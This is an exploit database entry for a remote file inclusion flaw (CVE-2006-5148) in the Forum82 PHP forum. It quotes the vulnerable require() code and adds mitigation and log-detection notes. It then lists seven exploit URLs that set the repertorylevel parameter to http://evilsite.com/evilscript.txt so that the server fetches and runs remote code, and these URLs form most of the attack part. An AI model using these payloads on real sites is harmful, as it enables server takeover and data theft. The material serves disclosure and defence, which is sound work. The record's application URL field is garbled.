Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusions
Author: Silahsiz Kuvvetler
type: webapps
platform: php
port:
date_added: 2006-09-28
date_updated: 2016-09-12
verified: 1
codes: OSVDB-29419;CVE-2006-5148;OSVDB-29418;OSVDB-29417;OSVDB-29416;OSVDB-29415;OSVDB-29414;OSVDB-29413
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comf82_2.5.2.tar.bz2
#==============================================================================================
#Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
#===============================================================================================
#
#Critical Level : Dangerous
#
#Script Download : http://www.comscripts.com/jump.php?action=script&id=805
#
#Version : v2.5.2b
#
#================================================================================================
#
#Bug in :
#
#almost all files are affected...
#================================================================================================
#
#Vulnerable Code :
#
# summary & example:
#
# require($repertorylevel.'include/tables.inc.'.$e);
# require($repertorylevel.'lang/lang.inc.'.$e);
# require($repertorylevel.'include/db/mysql.inc.'.$e);
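#
# Why this matters: $repertorylevel is the path prefix of every require() above,
# and the request URLs in this advisory show it being supplied as a query
# parameter (presumably through register_globals, with the script apparently
# not initialising it first), so the included path is caller-controlled.
#
# Mitigation: assign $repertorylevel a fixed value inside the application before
# any require(), keep register_globals off, and keep remote includes disabled
# (allow_url_fopen / allow_url_include). In web server access logs, a
# repertorylevel= parameter carrying a URL value indicates probing for this issue.
#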
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3?repertorylevel=http://evilsite.com/evilscript.txt?
#
#bla...bla...
#
#
#
#
# The script files are installed on the website with a .php3 extension; take that into account.
#
#================================================================================================
#Discovered By : Silahsiz Kuvvetler
#
#
#Contact : co-type[at]hotmail[dot]com
#
#GreetZ : FaTTaLGazI - NarcoTic - 0xyGen
#
#
#==================================================================================================
# milw0rm.com [2006-09-29]